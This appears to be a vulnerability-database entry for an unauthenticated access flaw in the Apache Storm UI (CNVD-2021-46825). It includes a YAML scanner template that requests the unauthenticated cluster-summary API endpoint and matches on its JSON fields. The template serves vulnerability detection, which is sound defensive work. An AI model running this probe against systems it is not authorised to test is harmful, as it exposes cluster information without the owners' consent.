CNVD-2021-46825: Apache storm未经授权的访问

2025-08-01 Apache storm PoC Public

Description

Apache storm存在未经授权的访问漏洞,攻击者可利用该漏洞未授权访问,从而获取敏感信息及进行未授权操作等。

PoC

id: CNVD-2021-46825

info:
  name: Apache storm未经授权的访问
  author: wulalalaaa
  severity: critical
  description: |-
    Apache storm存在未经授权的访问漏洞,攻击者可利用该漏洞未授权访问,从而获取敏感信息及进行未授权操作等。
  reference:
    - https://storm.apache.org/releases/current/STORM-UI-REST-API.html
    - https://www.cnvd.org.cn/patchInfo/show/270651
  tags: cnvd,cnvd2021,unauth,storm
  created: 2021/10/23

rules:
  r0:
    request:
      method: GET
      path: /api/v1/cluster/summary
      follow_redirects: true
    expression: response.status == 200 && response.body.bcontains(b"{\"totalMem\":") && response.body.bcontains(b"\"stormVersion\":")
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities